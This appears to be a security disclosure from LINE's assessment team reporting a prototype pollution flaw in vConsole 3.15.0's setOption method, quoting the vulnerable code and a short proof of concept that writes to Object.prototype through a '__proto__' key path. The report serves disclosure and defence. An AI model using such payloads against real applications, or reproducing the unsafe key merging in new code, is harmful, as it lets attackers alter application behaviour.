hello.
This is LINE Security Assessment Team.
Share the security vulnerabilities we found.
CC. @03sunf, @shpik-kr
vConsole Version: 3.15.0
issue
|
public setOption(keyOrObj: any, value?: any) { |
|
if (typeof keyOrObj === 'string') { |
|
// parse `a.b = val` to `a: { b: val }` |
|
const keys = keyOrObj.split('.'); |
|
let opt: any = this.option; |
|
for (let i = 0; i < keys.length - 1; i++) { |
|
if (opt[keys[i]] === undefined) { |
|
opt[keys[i]] = {}; |
|
} |
|
opt = opt[keys[i]]; |
|
} |
|
opt[keys[keys.length - 1]] = value; |
|
this._triggerPluginsEvent('updateOption'); |
|
this._updateComponentByOptions(); |
|
} else if (tool.isObject(keyOrObj)) { |
|
for (let k in keyOrObj) { |
|
this.option[k] = keyOrObj[k]; |
|
} |
|
this._triggerPluginsEvent('updateOption'); |
|
this._updateComponentByOptions(); |
|
} else { |
|
console.debug('[vConsole] The first parameter of `vConsole.setOption()` must be a string or an object.'); |
|
} |
|
} |
Possible prototype pollution due to incorrect key and value resolution in setOptions in core.ts.
poc
var vConsole = new window.VConsole();
vConsole.setOption("__proto__.foo","bar");
vConsole.setOption("__proto__.noOrig",1);
console.log(Object.prototype.foo);
